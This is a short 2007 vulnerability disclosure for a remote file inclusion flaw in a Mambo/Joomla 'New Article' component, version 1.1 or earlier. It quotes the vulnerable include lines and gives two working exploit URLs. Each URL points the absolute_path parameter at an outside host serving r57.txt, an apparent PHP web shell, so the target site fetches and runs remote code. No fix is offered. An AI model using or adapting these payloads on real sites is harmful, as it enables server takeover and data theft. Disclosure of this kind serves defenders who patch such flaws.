Mambo-Joomla Component Article 1.1 Remote File Inclusion Vulnerability

2007-04-14 00:00:00

=======================================================
Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple
RFI
=======================================================
Found By : Cold z3ro , [email protected]
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site :
http://www.jxdevelopment.com/component/option,com_remository/Itemid,0/func,fileinfo/id,4/
==============================================
File : /components/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_com_articles.php'); <=
Line 65
======
http://site/joomla_path/components/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
========================================================
File : /classes/html/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_articles.php'); <= Line
24
======
http://site/joomla_path/classes/html/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=========================================================


#Long Life Palestine
#www.Hack-Teach.com

#

Fixes

No fixes

In order to submit a new fix you need to be registered.